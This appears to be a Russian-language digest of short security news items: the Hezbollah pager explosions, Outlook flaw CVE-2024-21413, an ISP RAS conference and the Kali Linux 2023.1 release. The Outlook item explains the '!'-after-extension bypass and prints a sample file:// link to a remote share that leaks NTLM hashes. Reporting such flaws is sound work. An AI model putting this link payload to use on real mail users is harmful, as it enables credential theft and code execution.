Более 2000 пейджеров и раций взорвались у представителей Хезболлы в Ливане, что привело к десяткам погибших и сотням раненых. Подрыв был инициирован удаленно, предположительно спецслужбами Израиля.

Уязвимость, обнаруженная компанией Check Point, получила обозначение CVE-2024-21413. Она активируется при открытии электронных писем с вредоносными ссылками в уязвимых версиях Outlook. Уязвимость затрагивает несколько продуктов Office, включая Microsoft Office LTSC 2021, Microsoft 365 для предприятий, а также Microsoft Outlook 2016 и Microsoft Office 2019. 

Уязвимость позволяет обходить встроенные защиты Outlook для вредоносных ссылок, встроенных в электронные письма, используя протокол file://, обращаясь через него к удалённому серверу злоумышленников.

Добавление восклицательного знака сразу после расширения документа позволяет обойти ограничения безопасности Outlook. В этом случае при нажатии на ссылку приложение будет обращаться к удалённому ресурсу и открывать целевой файл без вывода предупреждений или ошибок.

<a href="file:///\\10.10.111.111\test\test.rtf!something">ССЫЛКА</a>

Уязвимость позволяет удаленному атакующиему получить NTLM-хеш пользователя, выполнить произвольный код с помощью злонамеренно созданных документов Office и т.д.

На Github опубликован PoC.

4-5 декабря в главном здании Российской академии наук в Москве состоится ежегодная Открытая конференция ИСП РАН им. В.П. Иванникова, посвящённая 75-летию отечественных информационных технологий. Важной частью конференции станет секция «Образование, технологии, сообщество: системный подход к безопасной разработке».

Offensive Security выпустила дистрибутив Kali Linux 2023.1, первую в 2023 году версию (к тому же приуроченную к десятилетию проекта) с новым дистрибутивом Kali Purple, который предназначен для blue и purple team, то есть ориентирован для защитников инфраструктуры.

Теперь доступен некий баланс при проведении киберучений: специалисты по тестированию на проникновение со стандартным Kali против blue team команды, у которой теперь есть свой "swiss-knife-box" для мониторинга и отражения атак.